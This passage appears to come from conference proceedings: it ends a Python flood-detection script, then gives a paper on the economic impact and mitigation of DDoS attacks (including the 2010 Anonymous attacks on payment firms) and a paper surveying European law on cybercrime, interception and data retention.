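def build_sample_log():
    """Constructed log: three flooding sources issue 60 requests each within
    6 seconds; two ordinary visitors issue 5 each over 10 to 15 seconds. Every
    line carries the same GET, so no single line tells attacker from visitor."""
    base = datetime(2010, 12, 9, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(60):
        for ip in ("198.51.100.10", "198.51.100.11", "198.51.100.12"):
            lines.append(_log_line(ip, base + timedelta(milliseconds=100 * i)))
    for i in range(5):
        lines.append(_log_line("192.0.2.50", base + timedelta(seconds=2 * i)))
        lines.append(_log_line("192.0.2.51", base + timedelta(seconds=1 + 3 * i)))
    lines.append("malformed line that the parser must skip")
    return lines


if __name__ == "__main__":
    for ip, n in sorted(find_floods(build_sample_log()).items()):
        print(f"{ip}: {n} requests within 10 s")
```

Sources the function returns can be rate-limited or challenged individually, which leaves the ordinary visitors' requests untouched where a global filter could not. The threshold has to be tuned to the site's normal per-client rate (a busy NAT gateway legitimately looks like many clients behind one address), and the count must be kept per source rather than per URL, because the flood and the visitors request the same page.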
Another solution is to redirect incoming traffic to a block of unallocated IP range (Mirkovic et al 2004), but this presupposes forged or otherwise spoofed source addresses embedded in the packets, just as SYN cookies do. Backscatter traceback may also be used, which traces flood traffic back to its network ingress points.
3. Decision-making tree in case of the attack
The following tree (Figure 2) summarizes measures to be taken into account during a DDoS attack.
A sudden traffic surge may be explained by factors such as marketing campaigns, an affiliate system, appearance in media headlines, new product introduction etc. Q1 addresses this by explicitly querying whether the network activity is attributable to DDoS. As the increased bandwidth might also be an opportunity for the perpetrator to mask the initial phase of the attack, any anomalies should be monitored as to their duration and volume regardless.
After determining what type of DDoS is being deployed, countermeasures are outlined as described above. Infrastructure specifications (server capacity, stress test results) are rarely released publicly, so it is entirely possible the servers may withstand the attack without compromising QoS (Q2).
The DDoS threat should be mitigated as soon as possible. All precautions apart from blacklisting suffer time lags to administer and deploy, so Q3 and Q5 include time as a factor when monitoring bandwidth usage fluctuations for changes.
Employing spare resources (Q4) may help to alleviate the consequences, but the only guaranteed countermeasure is for the victim's server to be capable of handling the network flood, in the worst case scenario for days on end without interruptions. Migrating to a scalable cloud or grid environment may help to achieve this goal.
A feedback loop ensures only the optimum amount of additional elements (owned or leased) is used.
Figure 2: Procedural decision-making tree
4. Where, why and what happens when the attacks happen?
As the economy is one of the disciplines heavily utilizing information technology, concerns have been raised regarding security, overdependence on, and volatility of infrastructure as a primary business operations platform. Despite the Internet's enormous expansion, the economic hubs through which significant cash flows pass remain largely unchanged.
4.1 Where?
A new entrant to the ecosystem of electronic commerce is Facebook. Because of its widespread use by the general public it was identified as a security threat by independent sources, documented by practices such as frequent privacy policy changes, collecting, sharing and manipulation of personal information, as well as the attackers' ability to distribute malicious code more quickly via the system (Fan & Yeung 2010).
Amazon.com is a multinational electronic commerce company, the biggest online retailer in the US and also considered a major economic hub. It was chosen as an Anonymous cyber initiative target due to it hosting a WikiLeaks mirror before deciding to drop the support.
The third corporation is eBay with its PayPal subsidiary.
Not only financial entities are considered significant for online commerce, however. Google generates revenue from targeted advertising and affiliate marketing as well as preferential treatment of clients when search algorithms detect keywords in a search string.
Two categories are not included: financial markets' frontends and national symbols. While the former (represented by the New York, London, and Tokyo Stock Exchanges or the NASDAQ Stock Market) focus primarily on handling large sums of capital, the Internet functions solely as a medium of information exchange (external network), not the facilitator of buys and sells (internal isolated network). The interlopers would need to physically penetrate data centers or otherwise gain access to the inner network prior to launching the attack. Given the security precautions in these facilities, the scenario's probability and plausibility is only marginal. Electronic assaults on national symbols (government portals, cultural heritage, major religious groups) wouldn't so much generate substantial economic losses as hinder the trust of citizens in the nation's capabilities to protect the national cyberspace. Such attacks shouldn't therefore be deprioritized, given the effect they may have on public opinion.
4.1.1 Estimated Losses
The entities forming a substantial part of the virtual economy are summarized in the table below (Table 1). All the sites occupy Alexa Top 500 and Fortune 500 positions, which measure the number of unique visitors and rank US companies according to gross revenues, respectively. Direct estimated losses are calculated from 2009 net income (where corresponding data were unavailable, revenue was used instead). A year is converted to hours (365.25*24=8,766 hours) and the profit (revenue) divided by this constant, resulting in the arithmetic mean of net income (revenue) per hour.
Table 1: Significant commercial entities and estimated losses

| Name | Net Income / Revenue* [mil. USD] | Losses, 1 hour [USD] | Losses, 8 hours [USD] | Losses, 24 hours [USD] | Losses, 48 hours [USD] | DDoS target? | Tool used |
|---|---|---|---|---|---|---|---|
| Amazon.com | 902 | 102,898 | 823,180 | 2,469,541 | 4,939,083 | Yes | LOIC |
| eBay | 2,389.1 | 272,542 | 2,180,333 | 6,540,999 | 13,081,999 | No | — |
| Facebook* | 700 (est.) | 79,854 | 638,832 | 1,946,496 | 3,832,991 | No | — |
| Google | 6,520.45 | 743,834 | 5,950,673 | 17,852,019 | 35,704,038 | No | — |
| MasterCard | 1,462.53 | 166,841 | 1,334,730 | 4,004,189 | 8,008,378 | Yes | LOIC |
| PayPal* | 2,230 | 254,392 | 2,035,136 | 6,105,407 | 12,210,815 | Yes | LOIC |
| Visa | 2,966 | 338,353 | 2,706,822 | 8,120,465 | 16,240,931 | Yes | LOIC |
| Yahoo | 597.99 | 68,217 | 545,736 | 1,637,207 | 3,274,415 | Yes | ? |
| Total | | 2,026,931 | 16,215,442 | 49,676,323 | 97,292,650 | | |

Losses columns give direct estimated losses for the time offline. * Revenue used where net income data were unavailable.
The results don't represent actual losses, as the values are mathematically inferred under the assumption that a constant number of transactions is carried out every hour of the year. They are also inert to any indirect losses.
Five of the eight hubs have been targeted by DDoS attacks so far. Four of them were chosen as part of the Anonymous initiative utilizing Low Orbit Ion Cannon (LOIC), a modified version of an open source network stress testing application which offers no IP address obfuscation mechanism, allowing traceback (Pras et al 2010). Websites of Visa and MasterCard were inaccessible for varying periods of time, along with two of three PayPal subdomains. Amazon.com managed to handle the incoming traffic due to excess capacities employed before the Christmas shopping period. Yahoo was inaccessible for a period of three hours.
The results, despite being a crude measure, demonstrate what impact a blackout of a mere hour would have, with more than two million USD in estimated direct costs provided all the sites were taken offline simultaneously.
4.1.2 Infrastructure capacities
The virtual economy is vulnerable to DDoS attacks, and the time for a broader industry and expert discussion regarding the elevation of security policies, not only on the hardware/software level but primarily as a proactive measure, is necessary. Servers forming the basis of the economy may be overloaded in a matter of minutes if spare resources are not employed.
It is known that Amazon.com offers robust cloud computing services as part of its highly scalable Amazon Elastic Compute Cloud (EC2), utilized by the company itself.
Facebook is running a platform consisting of 800 servers capable of handling 200,000 UDP requests per second.
eBay's servers span 600 production instances in more than 100 server clusters, handling a billion page views a day. Assuming every page view is equal to a connection request, the arithmetic mean produces 11,575 requests a second.
No reliable data source exists to estimate PayPal's server capacity, but since it is a subsidiary of eBay, infrastructure resources are likely shared between the two sites.
Google considers its server cluster parameters to be sensitive data and provides no specific information.
Visa operates its own Virtual Private Network (VPN) and handles 2.5 million transactions per hour. Nevertheless, as the infrastructure wasn't able to accommodate the estimated 5,000–9,000 connections generated by the members of Anonymous, not every transaction requires an active connection.
MasterCard servers handle more than 5.4 million transactions per day. The same as in the case of Visa applies, though, as it wasn't able to handle the group's continuous stream of requests.
4.2 Why and what?
Assessing the motives of the interlopers requires acceptance of uncertainty, since proper scientific research is precluded. Attackers either go to great lengths to obfuscate their identities or declare their agendas only collectively in general statements.
4.2.1 Motives
As the DDoS attacks came into broader media and public focus in relation to the Anonymous initiative, the group itself may provide some insight as to the purpose of their actions. The primary motive of Operation: Payback, instigated and so titled by this loose collective of individuals, was to retaliate against companies which refused to process further payments (PayPal, Visa, MasterCard) or denied use of their infrastructure and services (Amazon.com's EC2 and cessation of selling of an electronic book containing the first 5,000 cables) to WikiLeaks as it released confidential US military and diplomatic cables. In the December 10, 2010 press release the group assures it didn't seek to assail any critical infrastructure but only to raise awareness, calling its activities a legitimate expression of dissent. It also states the attempt on Amazon.com servers never occurred, which contradicts the outage of the company's several European subdomains on December 26, 2010 as well as media coverage of attempts to disrupt the service on December 9, 2010.
Other interests aren't readily available and may only be hypothesized about. On the national level, stimulation of social repercussions and general opinion disintegration, especially when treated by the media, may be considered. However, inability to protect national interests in cyberspace may lead to increased pressure to administer measures mitigating the consequences, leading to overall net positive effects. United States Cyber Command (USCYBERCOM), Naval Network Warfare Command (NETWARCOM), the Japanese Cyber Clean Center, the European Security Technology Assessment Unit, and the Chinese People's Liberation Army (PLA)'s electronic warfare department ("Information Security Base") were created to defend the cyberspace territories of the respective states and to prevent future breaches.
On the economic level, loss of consumer loyalty, causing indirect financial losses and a shift in customers' preferences, investors' withdrawal, cash flow decrease, additional costs of security and information technology audits, infrastructure resources expansion and public relations costs in a strategic perspective aren't farfetched. Short-term effects are affected by the season during which the attack is commenced, with the most substantial losses generated before the end of the year. As documented by Amazon.com, additional resources lowering the risk of DDoS are integrated during these periods.
4.2.2 Social repercussions
The Internet as a rapidly evolving medium is distrusted when used as a facilitator of financial transactions, especially in contrast to the conservative paradigms many "traditional" institutions are based on. The situation is worsened by a gap between professionals' and end-users' knowledge of technology trends, protocols and threats. This deficit is exploited by the media when informing about computer security-related incidents.
In a strategic perspective, DDoS may lead to a detriment in the subjective notion of personal information's safety. With the main source of news for the general public being the media, and the complex phenomena of network and data security requiring long-term study, misinformation is the logical result.
As commercial economic hubs are the primary targets, an increase in the number of incursions may lead either to buyers choosing local, smaller-scale companies or to limiting the number of purchases on the Internet altogether, preferring offline shopping. A proper, unbiased and technically accessible online training course or manual, describing the underlying terminology in simple terms and assuring that financial and personal data are safe during a DDoS attack, is required.
The second major concern is the public's reaction in case electronic banking servers stopped functioning, which might have serious consequences as remote account management is a crucial part of the services offered by banks. Not only would the situation require the immediate attention of law enforcement agencies but also action on behalf of the legislative branch, as laws governing loss of profits, unforeseen costs and the fulfilment of enforceable contracts in this area remain vague. Would the costs have to be redressed by the institutions which failed to protect the interests of their clients through insufficient architecture stress testing against such attempts, or by the attackers? And if the perpetrators are apprehended, will they be prosecuted under the law of their countries of residence, the law of the affected country, or international law? Until answers to these questions are provided and clearly communicated to Internet users, it remains a "no man's land", an unregulated grey zone.
The last concern is tied to an increase in racial sentiments. As the attackers' identities remain unknown, various theories regarding their nationalities are offered. The largest botnet operator is claimed to be operating from the Russian Federation, while the redirection of 15 % of Internet traffic through China in 2010, allegedly caused by faulty addresses in DNS servers' databases, spawned claims of purposeful misconfiguration in order to obtain a large amount of traffic data for analysis. Dissemination of such information without scientific, hard data-based research and conclusive evidence may lead to distrust of the ethnic diversity and inclusion, cultural convergence and social interactions the Internet is applauded for.
5. In conclusion
The challenge of containing DDoS attacks lies in the hostage situation they initiate. Global filtering mechanisms remain ineffective due to the presence of legitimate requests. Several solutions were presented which may help to mitigate the consequences, but no countermeasure able to automatically separate genuine traffic from the attack flood is currently known.
Topics for further research include analysis of institutionalized defense mechanisms and their cooperation in light of spontaneous cyber initiatives (Anonymous) forming and carrying out their agenda using widely available tools. So far only isolated, national-level initiatives exist, but dynamically evolving threat vectors require collective action and proactive efforts for their containment. Research will include priorities, programs and manifestos of individual organizations and an outline of the optimum model for a collective entity bringing together various intellectual aspects within the confines of a consented-upon framework.
Another topic of interest is the shift in laws governing cyber crimes in the wake of recent developments, beginning with the attacks of September 11, 2001. The Patriot Act and Critical Infrastructure Protection regulations in Europe, the US and Asia, along with their comparison, may bear interesting results. Common and contradicting elements among jurisdictions form the basis for analyses which may even provide hints as to the attackers' locations, assuming they prioritize countries with lower criminal penalties.
Properties of known botnets, their capabilities and quantitative research of global spam levels in relation to deployed countermeasures create a foundation for estimating the profit the operators generate from controlling these arrays of nodes.
A model of the motivating factors behind DDoS incorporating multidisciplinary findings (computer science, game theory) is also a viable opportunity for study, together with in-depth research of media coverage of computer security-related events, a source of both journalistic and theoretical exploration.
Acknowledgements
This work was supported by the "Competency Based e-Portal of Security and Safety Engineering" project under contract number 502092-LLP-1-2009-SK-ERASMUS-EMHE.
Legal Protection of Digital Information in the era of Information Warfare
Małgorzata Skórzewska-Amberg
Kozminski University, Warsaw, Poland
mskorzewska@kozminski.edu.pl
Abstract: The danger of uncontrolled use of computers and computer networks has begun to be noticed in the last few years. Criminal acts committed in networks, with the use of networks and against networks reach beyond national borders. Since the 1990s, when the United Nations (UN) recognized computer violation as a form of transborder crime, profits originating in computer crime have surpassed those from the drug trade. Organized crime is adapting to the environment of advanced technology, using thousands of computer networks to commit crimes on a global scale. Openness and anonymity are the strength of the Internet, but remain at the same time its greatest weakness. Among network users, the group which aims at undesired or even unlawful accessing, distributing and exchanging of information is growing. Technical solutions in information security have to be supported by demands to follow the rules of relevant procedures, assured through legal state obligations and sanctions in case of violation of such rules. Translating the language used by modern technology into proper legal language, and catching behaviour seemingly unimportant or of minor consequence but causing major damage, turned out to be most difficult. It is hence of great significance to adopt laws covering as much of cyberspace behaviour as possible. One of the most effective methods of securing digital information is concealing it with the use of cryptography. It is true that communication using concealed information protects the privacy and secrecy of mail to a high degree, but at the same time it renders access to information considerably more difficult in cases when the common good demands breaking such secrecy. Such procedures are most often carefully described and rigorously regulated by law, since they interfere with the sensitive question of citizens' privacy. There is nevertheless still a need to specify, i.a., how to use available cryptographic tools in order to access the content of cryptographically concealed transmissions without having access to the cryptographic keys. All efforts to exercise control over the Internet create controversy, raising questions about freedom of speech, stirring up protests about censorship and calling into question the intrusion of state authorities upon the private sphere of network users. At the same time, more countries introduce legal instruments of decree and prohibition in order to prevent law violation which the Internet facilitates or even makes possible. In times of terrorism threats, efforts aiming at introducing measures which allow a certain degree of control over the virtual space are intensified. This certainly requires a balance between the necessity of security regarding citizens and the need to guarantee their rights.
Keywords: computer network, legal interception, unauthorized access, cybercrime, anonymity, cryptography
1. Introduction
The aim of this paper is primarily to identify and describe some of the most burning issues at the crossroads of law and information technology. In order to discuss relevant legislative solutions, it is first necessary to provide a more general survey of the background to these challenges.
Greatest among the challenges at stake is the urgent necessity of greater international cooperation in combating a wide range of crimes committed in ICT networks, as well as further legislative harmonization on a global scale.
Finally, an effort is made in the conclusions to identify some of the more important legal priorities in combating global cybercrime.
2. Information as the foundation of modern society
While the last decades of the previous century saw a tremendous development in computers and computer networks, the new century sees an explosive expansion and global use of information and communication technology. The information society is a fact and defines the highly developed society in which full access to services and information is guaranteed through ever evolving ICT technology (cf. Bangemann's Report; Directive 98/34/EC of the European Parliament and of the Council of 22 June 1998 laying down a procedure for the provision of information in the field of technical standards and regulations, OJ L 204, 21.7.1998, p.37–48).
Updated information, accessible at any time, is often the key to success – scientific, economic and political. The consequences of disrupting the integrity of information can often be serious. Concealing and modification of information is as dangerous as its destruction.
At the foundation of well functioning information societies lies security, defined not only by technical instruments such as cryptography, but also by legislation. With the widespread distribution of computer systems and the ease with which various systems communicate with each other, exchange of data is not restricted in space and can be subject to different legal systems.
Convergence of law is therefore a necessary precondition in order to guarantee legal protection of persons in different countries.
3. Information as subject and object of law order disruption
Methods used in computer crime have been and will be changing along with continuous technological development. Ways of unauthorized interference with computer systems are growing more sophisticated and complex.
It is of course possible to identify different types of abuse in computer systems, computer networks and in the entire cyberspace, but such distinctions are increasingly less essential in a situation where practically every computer user can get access to the network sooner or later.
It is also increasingly difficult to define individual forms of information technology violation. These are often interconnected, as the consequence or the cause of another violation. As an example, viruses are often used with the purpose of gaining control over information in a network or of disguising an intrusion. Furthermore, frauds, including computer frauds, are often connected to the breaking of security measures or unauthorized disruption of information integrity. Finally, pornography, especially child pornography, can also be used as a particularly effective instrument of pressure (including blackmail), for instance in connection with network intrusion.
3.1 Information as instrument of law order disruption
The prime intention of widespread access to information, and the ease with which it can be made public and searched, is to enable the exchange of views, facilitate trade and stimulate research.
At the same time, such information can be used to create a negative perception of, for example, a competitor or to exercise pressure. This can happen when opinions about concrete persons, companies or products are expressed on public Internet forums.
Consequently, the number of network users focusing on access, distribution and exchange of information undesired by law or illegal is increasing.
Global computer networks are to be considered a public place of speech. This is the reason why regulations concerning violation of public order, criminal acts against freedom of conscience and religion, and criminal acts against bodily integrity and inviolability can apply to content appearing in public network forums.
Criminal law in most countries prohibits, i.a., public promotion of fascism or any other form of totalitarian system, or public dissemination of nationalistic, ethnic, racist or religious dissension, as well as defamation based on national identity, ethnicity, race, religious affiliation or lack of denomination (i.a. art. 256 and 257 of the Polish Penal Code (kodeks karny - kk); art. 86, 86a, 130 - 131 of the German Penal Code (Strafgesetzbuch - StGB); art. 225-1, R624-3, R624-4 and R625-7 of the French Penal Code (Code pénal - C.P.) and art. 1 of Loi 90-615 du 13 Juillet 1990 tendant à réprimer tout acte raciste, antisémite ou xénophobe, Journal Officiel Numéro 162 du 14 Juillet 1990), and penalizes violation of the religious feelings of other persons committed by offending objects of religious cult (e.g. art. 196 kk, art. 166 StGB).
Penalized is defamation of natural and legal persons, and of organisations not having the status of a legal person, with regard to such acts or features which could bring discredit in the face of public opinion or result in the loss of confidence necessary for a given position, occupation or kind of activity (insult and defamation – art. 212, 216 § 2 kk; art. 185-188 StGB).
A different kind of illicit act which can be committed through a computer network is the use of illegal violence or threats intended to make another person act in a certain way or fail to act, or threats to commit illegal acts against another person or somebody close to them, if such a threat gives rise to justified fear (art. 115 §12 and 20, 119, 190 and 191 kk; art. 240 and 241 StGB; British Public Order Act 1986, Protection from Harassment Act 1997, Telecommunications Act 1984 and Malicious Communications Act 1988).
An example of such an act is the sending of threatening letters by electronic mail or publishing material of a threatening character on network sites.
Illegal content consists not only of racist or pornographic material, but also, i.a., of instructions on how to build a bomb, real or logical, methods to create computer viruses, how to bypass security devices for computer programmes and systems, and distribution of programmes without respect for copyright laws. Dissemination of information intended to undermine confidence in concrete persons or institutions is also part of information warfare.
3.1.1 Accountability framework of service administrators
A matter of increasing urgency is the necessity to define the legal accountability of service administrators for content made public in global networks.
Within the framework of the European Union, the liability of service administrators is defined in Directive 2000/31/EC of the European Parliament and of the Council of 8 June 2000 on certain legal aspects of information society services, in particular electronic commerce, in the Internal Market (Directive on electronic commerce, OJ L 178, 17.7.2000, p.1–16).
Although the directive is concerned primarily with the question of trade, a service provider, defined as any natural or legal person providing an information society service (i.e. any service normally provided for remuneration, at a distance, by electronic means and at the individual request of a recipient of services), is in many cases the provider of network services.
The service provider, according to the directive, is not liable for the transmission of data provided by a recipient of the service, or for the provision of access to a communication network, if he does not initiate the transmission, does not select the receiver of the transmission and does not select or modify the information contained in the transmission. Transmission is denoted by the directive as intermediate and transient storage of information transmitted for the sole purpose of carrying out the transmission in a communication network.
The service provider is also not liable for automatic, intermediate and temporary storage of information transmitted or provided by a recipient of the service, if he does not modify the information, complies with the conditions concerning access to the information and its updating, and does not interfere with any lawful use of technology.
The provider nevertheless has the duty to act expeditiously to remove or to disable access to stored information if and when he obtains knowledge of the fact that the information at the initial source of the transmission has been removed from the network, or access to it has been disabled, or that a court or an administrative authority has ordered such removal or disablement.
The service provider is also not liable for the storage of information provided by a recipient of the service if he has no actual knowledge of any illegal activity or is not aware of facts or circumstances from which the illegal activity or information is apparent, and, upon obtaining such knowledge or awareness, acts expeditiously to remove or to disable access to the information.
Many European countries have made an effort to regulate the accountability of computer network operators, particularly when it comes to Internet access.
In Finland, providers of communication services, including providers of Internet services and computer network administrators, are obliged to control the content of their networks. They are liable for any criminal offence if the publication of certain content depends on their decision. They can be made accountable even if the network publication does not depend on their decision, if they fail to make any effort to eliminate the illegal content.
The Swedish Lag om ansvar för elektroniska anslagstavlor (SFS 1998:112 with amendments) makes the service provider responsible for information regarded as obviously illegal (i.a. of racist or pornographic character or in cases of violation of copyright laws) and found in networks for which the service provider is administratively responsible, regardless of whether the provider was responsible for its introduction into the network. The Swedish law requires that the administrator supervises the flow of information in the network. The frequency of the control to be carried out depends on the content of the service. Commercial services should be controlled more often than private ones. If law infringements are common, the administrator is obliged to maintain regular control and eliminate illegal content; if such infringements are rare, it is sufficient to caution the users.
3.1.2 Anonymity in networks
The general problem of accountability for content on the Internet will increase. Anonymity, which until recently was the strength of networks, can soon be one of the major threats against the legal framework which defines our societies. Applications for creating anonymity in Internet transactions are more and more common.
More countries introduce new legal instruments to prevent law violation facilitated or even made possible by the Internet. It therefore seems impossible to avoid solutions restricting the anonymity of network users. However, it is important to stress that this is not about disclosure of identity towards other users, but only about enabling access to a concrete person in case of law violation.
Terrorism threats are also the reason why efforts are intensified to introduce measures allowing a certain degree of control over the virtual space.
The problem of anonymity is nonetheless extraordinarily difficult. Its solution certainly requires maintaining a balance between demands of security for citizens and guarantees of their rights.
3.1.3 Information integrity as a protected interest

Applying digital technology to secure information when it is generated, stored and transmitted requires close and consistent cooperation between all users of a particular network. Technical solutions in information security demand that the rules of the relevant procedures are strictly followed and supported by legal obligations of the state and by sanctions in case of violation.

The duty to penalize intentional and unauthorized access to a computer system results from international prescriptions (i.a. the Council of Europe Convention on Cybercrime, ETS No. 185, or Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks against information systems, OJ L 69, 16.3.2005, p. 67–71), as well as from national legislation in many countries.

Activities aimed at gaining access to computer systems by breaking or cunningly bypassing security devices, obtaining passwords or exploiting security gaps, regardless of whether the object is a single computer or a network, are penalized in a number of European laws.

The British Computer Misuse Act 1990 recognizes unauthorised access to computer material as an offence. The French penal code (art. 323-1), on the other hand, recognizes as an offence fraudulently accessing or remaining within all or part of an automated data processing system, while the German penal code in art. 202a does not limit the offender's activity – undertaken in order to obtain data especially protected against unauthorised access – to collateral data breaking.

The Finnish penal code, in chapter 38, section 8, provides liability for unlawful access to a computer system using an unauthorised access code or by otherwise breaking a system protection. Similar solutions are to be found in the Swedish penal code.

Polish legislation protects access to information against its unauthorized obtaining, penalizing violation of the integrity of information systems and placing it on the same level as opening a closed document, connecting to telecommunication networks, breaking or bypassing electronic, magnetic or other particular protection of information, as well as installing or using interception devices, visual or other equipment or programs (art. 267 kk).

Violation of information integrity consists not only of gaining access to the information by an unauthorized person, but also of preventing, or making it difficult for, an authorized person to gain access to the information in question (art. 268 § 1 kk, 268a, 303a StGB; British Computer Misuse Act 1990).
Another severe act is disturbing the functioning of a computer or computer system through unauthorized violation of its integrity or by the transmission of data (269a kk; art. 323-1, 323-2, 323-3 C.P.). An example of such acts is the introduction of viruses into a system, aimed not so much at destroying data as at slowing down the computer to a great extent. Another example is transmitting into a network echo requests to an address, consequently paralyzing the network.
Particular legal protection should be guaranteed in connection with data of substantial importance for public administration and the economy. Security violations of such information, often called computer sabotage, are therefore penalized through separate provisions (e.g. art. 269 kk, art. 303b StGB, art. 411-9 C.P.).

Violation of information integrity is often connected with violation of state or official secrets. Penal codes protect such information (i.a. art. 265-266 kk; art. 95-97b, 203, 204, 353b, 355 StGB; art. 226-13, 413-9, 413-10, 413-11 C.P.; British Official Secrets Act 1989), treating access to a state secret as its disclosure.
4. Information security and the right to privacy

Protection of digital information covers not only protection of information stored in computer systems, but also information in transmission. Protection of the right to communicate in confidence is closely linked to the right to privacy.

Such issues are regulated i.a. in Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of privacy in the electronic communications sector (Directive on privacy and electronic communications, OJ L 201, 31.7.2002, p. 37–47), which aims at harmonizing the provisions in force in Member States. The objective is to ensure an equal level of protection of fundamental rights and freedoms, in particular the right to privacy, with respect to the processing of personal data in the electronic communications sector, and to ensure the free movement of such data and of electronic communication equipment and services in the Community.

The directive defines a user as any natural or legal person using a publicly available electronic communications service, for private or business purposes. Communication means any information exchanged or conveyed between a finite number of parties by means of publicly available electronic communications services. A call is defined by the directive as a connection established by means of a publicly available telephone service allowing two-way communication in real time.
Public communications network and electronic communications service are defined by art. 2 (d) and (c) of Directive 2002/21/EC of the European Parliament and of the Council of 7 March 2002 on a common regulatory framework for electronic communications networks and services (Framework Directive, OJ L 108, 24.4.2002, p. 33–50). A public communications network is understood as an electronic communications network – i.e. a transmission system and other resources which permit the conveyance of signals by wire, radio, optical or other electromagnetic means – used wholly or mainly for the provision of publicly available electronic communications services. Electronic communications service means a service normally provided for remuneration which consists wholly or mainly in the conveyance of signals on electronic communications networks, but excludes services providing, or exercising editorial control over, content transmitted using electronic communications networks and services. This definition does not include information society services, as defined in Article 1 of Directive 98/34/EC, which do not consist wholly or mainly in the conveyance of signals on electronic communications networks.
Furthermore, the directive on privacy and electronic communications introduces a definition of electronic mail, describing it as a text, voice, sound or image message sent over a public communications network which can be stored in the network or in the recipient's terminal equipment until it is collected by the recipient.

Member States are obliged by the directive to introduce such provisions in national legislation as ensure the confidentiality of communications over publicly available electronic communication services. In particular, listening, tapping, storing or other kinds of interception or surveillance of communications – without the consent of the users concerned – should in principle be forbidden. The necessity to secure information transmission against unauthorized access is the subject of penal code rules and procedures.

Property law penalizes access to information in transmission (including violation of the secrecy of correspondence and the use of interception) carried out without authorization (i.a. art. 267 kk; art. 201-202b, 206 StGB, art. 85, 87 of the Telekommunikationsgesetz (TKG) vom 25. Juli 1996 (BGBl. I, S. 1120) with later amendments; art. 226-1, 226-2, 226-3, 226-15, 432-9 C.P.; British Regulation of Investigatory Powers Act 2000).
Restricting any kind of privacy, including the right to communicate, is at the same time permitted in certain cases. Art. 15 par. 1 of the directive on privacy and electronic communications stipulates that Member States may adopt legislative measures to restrict the scope of the right to privacy when this is necessary, appropriate and proportionate within a democratic society to safeguard national security, defence, public security, and the prevention, investigation, detection and prosecution of criminal offences or of unauthorised use of electronic communication systems. A similar sanction is introduced by the procedural law provisions of the Convention on Cybercrime (art. 14-21).

Sanction in national legislation for gaining access to the content of information in transmission is most often to be found in formal legislation and is curtailed by a number of conditions. Among the more important ones are: limiting the possibility of gaining access to information in transmission to cases where there is a justified suspicion of a violation of law; the necessity of permission from certified authorities (normally courts) to gain access to information in transmission, or supervision by certified authorities over the process (i.a. in German law art. 100a–100d, 218 of the Criminal Procedure Code, and regulations concerning extra-judicial surveillance included in particular regulations; provisions in the French Loi 91-646 du 10 Juillet 1991 relative au secret des correspondances émises par la voie des télécommunications, Journal Officiel Numéro 162 du 13 Juillet 1991; the British Regulation of Investigatory Powers Act 2000; art. 218, 218a, 230a, 236, 237-242 of the Polish Criminal Procedure Code, art. 159 § 2, 160, 161, 179, 180 ustawy z dnia 16 lipca 2004 roku – Prawo telekomunikacyjne, Dz.U. Nr 171, poz. 1800 with amendments, as well as regulations concerning extra-judicial surveillance included in particular regulations).
4.1 Cryptography and legal access to information in transmission

One of the most effective methods of securing digital information is concealing it with the use of cryptography. Problems emerge when authorities certified to gain access to information in transmission encounter encrypted information. Modern cryptographic technology enables concealing information with a very high degree of efficiency. Often the only method of gaining access to the content is a brute-force attack, which is not economically worthwhile.

Law-makers therefore try to protect the interest of the state when access to information in transmission is authorized. Regulations concerning authorized interception often oblige entities responsible for the transmission to provide cryptographic support (e.g. the British Regulation of Investigatory Powers Act 2000; art. 11-1 of the Loi 91-646 du 10 Juillet 1991 relative au secret des correspondances émises par la voie des télécommunications, Journal Officiel Numéro 162 du 13 Juillet 1991; in Poland § 7 and 8 of the rozporządzenie Ministra Sprawiedliwości z dnia 24 czerwca 2003 roku w sprawie sposobu technicznego przygotowania sieci służących do przekazywania informacji, do kontroli przekazów informacji oraz sposobu dokonywania, rejestracji, przechowywania, odtwarzania i niszczenia zapisów z kontrolowanych przekazów, Dz.U. Nr 110, poz. 1052; art. 19 of the Swedish Lag (2003:389) om elektronisk kommunikation).
4.2 Retention of data as an instrument to secure information

Directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on the retention of data generated or processed in connection with the provision of publicly available electronic communications services or of public communications networks and amending Directive 2002/58/EC (OJ L 105, 13.4.2006, p. 54–63) is to be seen as an instrument in combating modern crime, including computer crime.

The directive obliges providers of publicly available electronic communication services to retain data concerning connections made over fixed networks, mobile and Internet telephony, as well as Internet access and Internet electronic mail, including information concerning the source and destination of a communication and its location, date, time, duration and type (no data revealing the content of the communication may be retained).

User is defined as any legal or natural person using any publicly available electronic communication service, including a person who has not subscribed to such a service (art. 2 par. 2 sub-paragraph b). Although the intention of the directive was to make it possible to establish the identity of the user, regardless of his or her status as subscriber or user, a distinction was made between user and registered subscriber (without a precise definition of registered subscriber), leaving pre-paid service users outside the range of the directive.
Even if article 5 par. 1 sub-paragraph e.2.vi stipulates retention and storing of the activation date and time of an anonymous pre-paid service, as well as the location label from which the service was activated, such data is of little use in prosecuting, for example, cybercrime committed in cyberspace accessed through an anonymous service (for example data transmission carried out via a pre-paid mobile phone). Some European countries, i.a. Germany, Italy, Greece, Slovakia and Switzerland (not an EU member), have introduced an obligation to register pre-paid SIM card buyers (understood as users); outside Europe, for example in the USA, a bill has already been drafted requiring registration of telephone card users. Other countries, such as Poland, allow registration of telephone card users on a voluntary basis. Still other countries treat such users as completely anonymous.

From this point of view, the legislative heterogeneity could result in the failure of the very basic intentions of the legislator with regard to the possibility of establishing the identity of a pre-paid card user. A person who wants to remain anonymous can easily buy a card in a country where there is no obligation to register the buyer.
5. Conclusions

The technological revolution we are witnessing has moved a substantial part of human activities into the virtual sphere, making modern societies in general not only strongly dependent on ICT systems, but increasingly vulnerable.

Criminal acts committed in networks, with the use of networks and against networks reach beyond national borders. Already in the 1990s, the United Nations (UN) recognized computer abuse as a form of transborder crime.

At the beginning of the 21st century, profits originating in computer crime surpassed those from the drug trade. Expert assessments indicate that they are now equal to the global level of income from illegal as well as legal trade in weapons (Mejssner, 2007).

In the last few years, terrorist attacks have become increasingly common, aimed primarily at the structures on which modern societies are built. The target of a terrorist attack could be a computer network or, more likely, public, social or economic structures (for example banks, research institutions, nuclear plants etc.), all functioning on the basis of such networks.

In the coming years, attacks on computer systems are expected to become more common. The target of such attacks is expected to consist mainly of banking infrastructure and other so-called critical infrastructure. Recently three such known attacks were successfully carried out in Europe: in 2007 in Estonia, and in 2008 in Lithuania and Georgia.

It is therefore of fundamental importance to ensure the security of computer networks and their users, not least since virtual space, as we have seen, is particularly attractive for digital warfare.

